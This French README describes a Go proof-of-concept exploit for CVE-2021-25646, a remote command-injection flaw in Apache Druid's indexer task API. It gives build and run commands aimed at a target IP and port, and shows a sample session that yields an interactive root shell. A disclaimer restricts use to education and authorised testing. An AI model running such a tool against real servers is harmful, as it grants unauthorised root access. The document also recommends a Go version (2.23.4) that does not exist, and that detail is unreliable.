
Une preuve de concept pour le CVE-2021-25646, qui permet l'injection de commandes.
Ce dépôt contient une preuve de concept (PoC) pour CVE-2021-25646, une vulnérabilité critique d'exécution de code à distance dans Apache Druid.
L'exploit est écrit en Go et permet une injection de commande interactive via le terminal.
Vous devez avoir Go installé (version 2.23.4 recommandée).
go build .
Cela produira un binaire dans le répertoire actuel.
Vous pouvez exécuter l'exploit soit en compilant le binaire, soit directement avec go run.
-i : Adresse IP du serveur Druid cible (obligatoire)-p : Port du serveur Druid cible (obligatoire)-proxy : Spécifie l'URL du proxy (facultatif)Exécuter le binaire compilé :
./cve -i 127.0.0.1 -p 8888
Ou exécuter directement avec Go :
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
Vulnérabilité :
L'exploit abuse d'une validation d'entrée incorrecte dans le composant indexer de Druid, plus précisément dans l'API task, permettant une injection de commande via des charges utiles JSON conçues.
Références :
Ce logiciel est fourni uniquement à des fins éducatives.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce code.
Obtenez toujours une autorisation appropriée avant de tester un système.